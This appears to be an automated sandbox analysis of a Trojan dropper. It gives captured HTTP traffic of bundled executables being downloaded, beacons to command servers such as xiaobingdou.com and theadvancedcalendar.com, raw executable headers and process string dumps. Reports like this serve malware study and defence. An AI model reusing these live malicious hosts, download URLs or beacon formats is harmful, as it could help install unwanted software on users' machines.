Y@%Qn*@E%^b$sW$m@(tG(tL*ai#p@%LV$sK f[)Co*lK%nT*Si*Er Wb*lK f[)Co....#pV....)bE$oI)@I#p@%QU%wT)bE$oI..............................)jN*RP*tl%M_..)Pd)D[$md(ta#p@)DU%wT$bh(tA*Gq)@I........)Dh*Za .w wS%K@*Tc)\j)aT)Pd Wb*lK$qc(wz......)Dh*Za*Zu)pC...$qc(wz)At$qq)D[$md...*@K)bV*.d)J@$md..#pV(tw%my.....)I.%Xb)a[ `j(t~..............................................................................................................................................................................................*CC$s|*QL*c^$qc(wz$sW dG)D[$md.................................. Ur)vj*QL*c^)Wq%UI ED...........................................................................................
<<< skipped >>>
GET /offer/YeaPlayer_br_IBD_Bundle.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down.hejie123.com
Accept: */*
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 19 Apr 2016 08:58:04 GMT
Accept-Ranges: bytes
ETag: "0764a95199ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:52 GMT
Connection: keep-alive
Content-Length: 600312
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.*.%.y.%.y.%.y.].y.%.y.].y.%.y.].y9%.y...y.%.y.%.y.%.y.].y.%.y.w.y.%.y.].y.%.yRich.%.y................PE..L...Z.gV.................X..........i........p....@..........................`............@..........................................P..............0...............ps..............................8...@............p...............................text....V.......X.................. ..`.rdata..V....p.......\..............@..@.data...|?..........................@....rsrc........P......................@..@.reloc..V@.......B..................@..B........................................................................................................................................................................................................................................................................................................................................................3........t.5 .....t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 ...........8E.A........u......3.3...v$W..$......<13..........3...8E.A;.r._.......SU.l$ .E.V..3.W.F......N..~..X..t$..L$ ..._D...~..r..?.G.P.'......@..G........E...........3..D$ ............. ..D$...... ..D$...... .._..D$..;u.v..4....}..r..E....E...02O..T$.....K.;E.v.......}..r..M....M..D$..T$......2O......;E.v.......}..r..M....M..D$..T$......2O.....K.;E.v.......}..r..M....M..D$......2O.....K.
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=C528ED7CB09146c38C186BBBE233AE4A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 468
Connection: Keep-Alive
--C528ED7CB09146c38C186BBBE233AE4A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^..._(......j.?a$.<.-N.L'.%j.S=>;C.P_.Q.=.ix.Hc.=..wf.X*..;>.H0^~P.9e.D...&x.H(Pl..ko..a..86..d.:..w(.]=1E38566
--C528ED7CB09146c38C186BBBE233AE4A--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:07 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:07 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
GET /CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.intechnical.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:01 GMT
Server: PWS/8.1.36
X-Px: rf-ht h0-s1105.v0-mow ( h0-s1170.v0-mow), ht-d h0-s1170.v0-mow.cdngp.net
ETag: "a612003-5bb3c8-529aa33cff880"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2016 19:41:41 GMT
Age: 108860
Accept-Ranges: bytes
Content-Length: 6009800
Content-Type: application/x-msdownload
Last-Modified: Tue, 19 Jan 2016 06:44:34 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.................................c.\...@.................................@............\..........@.[......`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc....\.......^..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
POST /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: int.dpool.sina.com.cn
HTTP/1.1 200 OK
Server: Tengine
Date: Tue, 03 May 2016 01:55:47 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
SINA-LB:aGEuMTE4LmcyLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:OWJmMjk2Y2UgMCAwIDAgNSAwCg==
1.-1.-1...............
POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=26BC8369D6944cca92B4EAA85508054A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 450
Connection: Keep-Alive
--26BC8369D6944cca92B4EAA85508054A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^...ok.L...=4.P(Ml^.tf..5..v`.H&^>..~d.n"..v`..o.;..~r..oT.-*.H0^(..wU.N0..86..o.'..fw=1E38566
--26BC8369D6944cca92B4EAA85508054A--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:05 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:05 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..
POST /open/51486.ini HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: close
Content-Length: 1202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>..<title>405 - .................... HTTP ......</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>..........</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>405 - .................... HTTP ......</h2>.. <h3>....................................................(HTTP ....)..</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
Explorer.exe_660:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
BROWSEUI.dll
GDI32.dll
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHDOCVW.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
UxTheme.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
ExplorerStartMsgLoop
xpsp2res.dll
xpsp3res.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel
kernel32.dll
GetSystemWindowsDirectoryW
NetGetJoinInformation
WINMM.dll
SETUPAPI.dll
WINSTA.dll
OLEACC.dll
USERENV.dll
ntdll.dll
RegEnumKeyExW
RegNotifyChangeKeyValue
RegOpenKeyExA
RegEnumKeyW
RegCloseKey
RegCreateKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegCreateKeyExW
OffsetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetProcessShutdownParameters
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
ShellExecuteExW
SHRegCloseUSKey
SHRegCreateUSKeyW
AssocQueryKeyW
SHRegOpenUSKeyW
SHDeleteKeyW
TileWindows
ExitWindowsEx
RegisterHotKey
UnregisterHotKey
EnumChildWindows
GetKeyState
GetAsyncKeyState
CascadeWindows
MsgWaitForMultipleObjects
EnumWindows
explorer.pdb
name="Microsoft.Windows.Shell.explorer"
version="5.1.0.0"
Windows Shell
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
rundll32.exe_1976:
CalendarServ.exe_3180:
Calendar.exe_3428:
D:\jenkins\workspace\calendar\Release\calendar.pdb
CalendarEntry.dll
USP10.dll
KERNEL32.dll
EnumThreadWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
PSAPI.DLL
WinHttpCloseHandle
WinHttpReadData
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WinHttpReceiveResponse
WinHttpWriteData
WinHttpSetOption
WinHttpSendRequest
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpAddRequestHeaders
WinHttpOpenRequest
WinHttpConnect
WinHttpCrackUrl
WinHttpSetTimeouts
WinHttpOpen
WINHTTP.dll
COMCTL32.dll
IMM32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
GetCPInfo
GetConsoleOutputCP
SHFileOperationW
ShellExecuteW
USERENV.dll
WTSAPI32.dll
.?AVKeyboardEventArgs@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVReportNoInTimeBufferTask@statistics@@
.?AVReportNoInTimeFileTask@statistics@@
.?AVReportImpl@statistics@@
.?AVIDataReport@statistics@@
.?AVCMD5Checksum@@
d:d:d d-d-d
[%d]%s -> %s
W%d %d %d %d %d %d %d
%f %f %f %f %d %d %d
%d %d %d %d
%d %d
%s %d %d
%d %d %d %d %s %x %d
%d:%d
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
mscoree.dll
KERNEL32.DLL
{421DADC9-79C8-4211-82AD-D62013B970A7}
ntdll.dll
%d.%d
okernel32.dll
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_uu.cgi
2.0.0.11189
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_statistic.cgi
CrashReport.exe
CrashUL.exe
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
@WinHttpClient
Language.json
%sConfig%d\%s
%s%s%s
rhXXp://ime.baidu.jp/type/api/horoscope.php
hXXp://horoscopovirtual.bol.uol.com.br/horoscopo/xml-geradores/baidu/
hXXp://horoscope.mthai.com/feed-baidu.php
%s\%d.json
%d/%d/%d
d-d-d
%d.%d.%d
%[^;]; charset=%s
Festival_special.json
Config%d\%s
Config%d
Festival.json
Config%d\
%s\FestivalPicture\%s
%d-%d~%d
%d-%d
%d-%d-%d
Shell32.dll,Control_RunDLL "timedate.cpl"
rundll32.exe
config.json
AHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
Constellation_%s_layer
Constellation_%sValue%d
Constellation_%s0Value%d
Constellation_%sHalfValue%d
constellation_icon_%s_style
constellation_icon_%s0_style
constellation_icon_%shalf_style
head.default
%s %d
%s de %d
%s,%d
Tahoma.14.bold
1.2 1 0 0 55 255 0
0 1 0 0 55 255 0
%s d
%s%d %s
d:d:d
%s%d%s
1.0 0.1 0 0 255 55 4
1.0 0 0 0 255 55 4
1 1.2 0 0 255 55 4
Aexplorer.exe
report_thread_cs.wuyg
statistics::ReportImpl::~ReportImpl
1.0.0.1
statistics::ReportImpl::SerializeAllNoIntime
statistics::ReportImpl::WriteToNoIntimeFile
%s, no in time file, %s
%dddddd
%s out errir, upload inproc, %s
%s begin
%s end
%d.d.d-d:d:d
C:\08D88547-FF9F-4953-B96D-7B2B491E219E
%s_%d%s
XXxXXXXXXXX
\%d%d%0x
%s, record mix, old= %d, new= %d
%s, error, no call begin, threadid = %d
%s, in time file : %s
%s, error no begin threadid=%d
statistics::ReportNoInTimeFileTask::RunThreadTask
%s, error no nointime data
statistics::ReportNoInTimeBufferTask::RunThreadTask
%s, post fail, %s
%s, can del %s
%s, not can del %s
%s, error start %s
%s, setevent, outproc %s
\Guid\Common\I18N\conf.db
2\*.*
statistics::WinHttpPostMime::PostBuffer
%s file data empty
%s crackurl fail, %s
HTTP/1.1
\\.\pipe\I18NStat\c_s_w_u_y_g
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
127.0.0.1
http=
https=
5.1.2600.5512 (xpsp.080413-211
Calendar.exe
"%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe" from_service
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe
calendar.exe